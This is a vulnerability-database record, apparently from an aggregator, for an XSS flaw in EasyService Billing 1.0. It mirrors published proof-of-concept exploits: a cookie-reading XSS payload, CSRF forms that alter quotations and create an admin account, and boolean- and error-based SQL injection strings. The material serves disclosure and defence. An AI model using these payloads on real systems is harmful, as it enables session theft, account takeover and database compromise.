ID CVE-2018-11443
Type cve
Reporter cve@mitre.org
Modified 2018-06-25T21:54:00
Description
The parameter q is affected by Cross-site Scripting in jobcard-ongoing.php in EasyService Billing 1.0.
{"id": "CVE-2018-11443", "bulletinFamily": "NVD", "title": "CVE-2018-11443", "description": "The parameter q is affected by Cross-site Scripting in jobcard-ongoing.php in EasyService Billing 1.0.", "published": "2018-05-25T12:29:00", "modified": "2018-06-25T21:54:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11443", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/44764/", "https://gist.github.com/NinjaXshell/be613dab99601f6abce884f6bc3d83a8"], "cvelist": ["CVE-2018-11443"], "type": "cve", "lastseen": "2020-10-03T13:20:10", "edition": 3, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "exploitpack", "idList": ["EXPLOITPACK:6F2E7EA39EE83E4C8FCCE3DDBD058D0E"]}, {"type": "exploitdb", "idList": ["EDB-ID:44764"]}, {"type": "zdt", "idList": ["1337DAY-ID-30487"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147905"]}], "modified": "2020-10-03T13:20:10", "rev": 2}, "score": {"value": 3.5, "vector": "NONE", "modified": "2020-10-03T13:20:10", "rev": 2}, "vulnersScore": 3.5}, "cpe": ["cpe:/a:easyservice_billing_project:easyservice_billing:1.0"], "affectedSoftware": [{"cpeName": "easyservice_billing_project:easyservice_billing", "name": "easyservice billing project easyservice billing", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": ["cpe:2.3:a:easyservice_billing_project:easyservice_billing:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:easyservice_billing_project:easyservice_billing:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"zdt": [{"lastseen": "2018-05-30T01:05:38", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-05-29T00:00:00", "title": "EasyService Billing 1.0 - Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443"], "modified": "2018-05-29T00:00:00", "id": "1337DAY-ID-30487", "href": "https://0day.today/exploit/description/30487", "sourceData": "<!--\r\n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter\r\n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \r\n# Exploit Author: Divya Jain\r\n# Version: EasyService Billing 1.0 \r\n# CVE: CVE-2018-11443\r\n# Category: Webapps\r\n# Severity: Medium\r\n# Tested on: KaLi LinuX_x64\r\n# # # # #\r\n# \r\n# Proof of Concept:\r\n#\r\n ///////////\r\n // XSS //\r\n ///////////\r\n \r\n Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=\r\n Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n Parameter: q\r\n Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n \r\n ###########################################################################\n\n# 0day.today [2018-05-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30487"}], "exploitdb": [{"lastseen": "2018-05-28T00:30:41", "description": "EasyService Billing 1.0 - Cross-Site Scripting. CVE-2018-11443. Webapps exploit for PHP platform", "published": "2018-05-26T00:00:00", "type": "exploitdb", "title": "EasyService Billing 1.0 - Cross-Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443"], "modified": "2018-05-26T00:00:00", "id": "EDB-ID:44764", "href": "https://www.exploit-db.com/exploits/44764/", "sourceData": "<!--\r\n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter\r\n# Date: 25-05-2018\r\n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \r\n# Exploit Author: Divya Jain\r\n# Version: EasyService Billing 1.0 \r\n# CVE: CVE-2018-11443\r\n# Category: Webapps\r\n# Severity: Medium\r\n# Tested on: KaLi LinuX_x64\r\n# # # # #\r\n# \r\n# Proof of Concept:\r\n#\r\n ///////////\r\n // XSS //\r\n ///////////\r\n \r\n Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=\r\n Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n Parameter: q\r\n Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\r\n \r\n ###########################################################################", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44764/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nEasyService Billing 1.0 - Cross-Site Scripting", "edition": 1, "published": "2018-05-26T00:00:00", "title": "EasyService Billing 1.0 - Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443"], "modified": "2018-05-26T00:00:00", "id": "EXPLOITPACK:6F2E7EA39EE83E4C8FCCE3DDBD058D0E", "href": "", "sourceData": "<!--\n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter\n# Date: 25-05-2018\n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# Exploit Author: Divya Jain\n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11443\n# Category: Webapps\n# Severity: Medium\n# Tested on: KaLi LinuX_x64\n# # # # #\n# \n# Proof of Concept:\n#\n ///////////\n // XSS //\n ///////////\n \n Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=\n Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\n Parameter: q\n Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27\n \n ###########################################################################", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2018-05-29T09:48:54", "description": "", "published": "2018-05-26T00:00:00", "type": "packetstorm", "title": "EasyService Billing 1.0 CSRF / XSS / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11443", "CVE-2018-11442", "CVE-2018-11444", "CVE-2018-11445"], "modified": "2018-05-26T00:00:00", "id": "PACKETSTORM:147905", "href": "https://packetstormsecurity.com/files/147905/EasyService-Billing-1.0-CSRF-XSS-SQL-Injection.html", "sourceData": "`Exploit 1 of 3: \n \n<!-- \n# Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery \n# Date: 25-05-2018 \n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# Exploit Author: Divya Jain \n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11445,CVE-2018-11442 \n# Category: Webapps \n# Severity: Medium \n# Tested on: KaLi LinuX_x64 \n# # # # # # # # \n# \n# Proof of Concept: \n////////////////////////// \n/ CSRF in Quotation Page / \n////////////////////////// \n# Initial Request: \n \nPOST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1 \nHost: test.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 \nCookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2 \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 86 \n \nquotation_id=139"ation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1 \n \n# CSRF POC: \n \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139\" method=\"POST\"> \n<input type=\"hidden\" name=\"quotation_id\" value=\"139\" /> \n<input type=\"hidden\" name=\"quotation_no\" value=\"249\" /> \n<input type=\"hidden\" name=\"des\" value=\"testnew\" /> \n<input type=\"hidden\" name=\"button\" value=\"Save\" /> \n<input type=\"hidden\" name=\"MM_update\" value=\"form1\" /> \n<input type=\"hidden\" name=\"MM_insert\" value=\"form1\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n/////////////////////////// \n// CSRF in User Add Page // \n/////////////////////////// \n \n# Initial Request \n \nPOST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1 \nHost: test.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://test.com/EasyServiceBilling/system-settings-user-new2.php \nCookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6 \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 36 \n \ntype=Admin&un=a&pw=b&MM_insert=form1 \n \n# CSRF POC \n \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"http://test.com/EasyServiceBilling/system-settings-user-new2.php?\" method=\"POST\"> \n<input type=\"hidden\" name=\"type\" value=\"Admin\" /> \n<input type=\"hidden\" name=\"un\" value=\"adminTest\" /> \n<input type=\"hidden\" name=\"pw\" value=\"adminTest\" /> \n<input type=\"hidden\" name=\"MM_insert\" value=\"form1\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n--> \n \nExploit 2 of 3: \n \n<!-- \n# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter \n# Date: 25-05-2018 \n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# Exploit Author: Divya Jain \n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11443 \n# Category: Webapps \n# Severity: Medium \n# Tested on: KaLi LinuX_x64 \n# # # # # \n# \n# Proof of Concept: \n# \n/////////// \n// XSS // \n/////////// \n \nAffected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q= \nPayload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 \nParameter: q \nLink: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 \n \n########################################################################### \n \n \n \nExploit 3 of 3: \n \n<!-- \n# Exploit Title: EasyService Billing 1.0 SQL Injection on page jobcard-ongoing.php?q= \n# Date: 25-05-2018 \n# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 \n# Exploit Author: Divya Jain \n# Version: EasyService Billing 1.0 \n# CVE: CVE-2018-11444 \n# Category: Webapps \n# Severity: High \n# Tested on: KaLi LinuX_x64 \n# # # # # # # # \n# \n \n# Proof of Concept: \n//////////////////////////////// \nSQL Injection in q parameter \n/////////////////////////////// \nAffected Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q= \n# Boolean Based Blind SQL \nPayload: 1337'OR%20NOT 1=1-- \nLink: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT 1=1-- \n \n# Error-Based SQL \nPayload: 1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD \n \nLink: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD \n################################# \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147905/easybilling10-sqlxssxsrf.txt"}]}
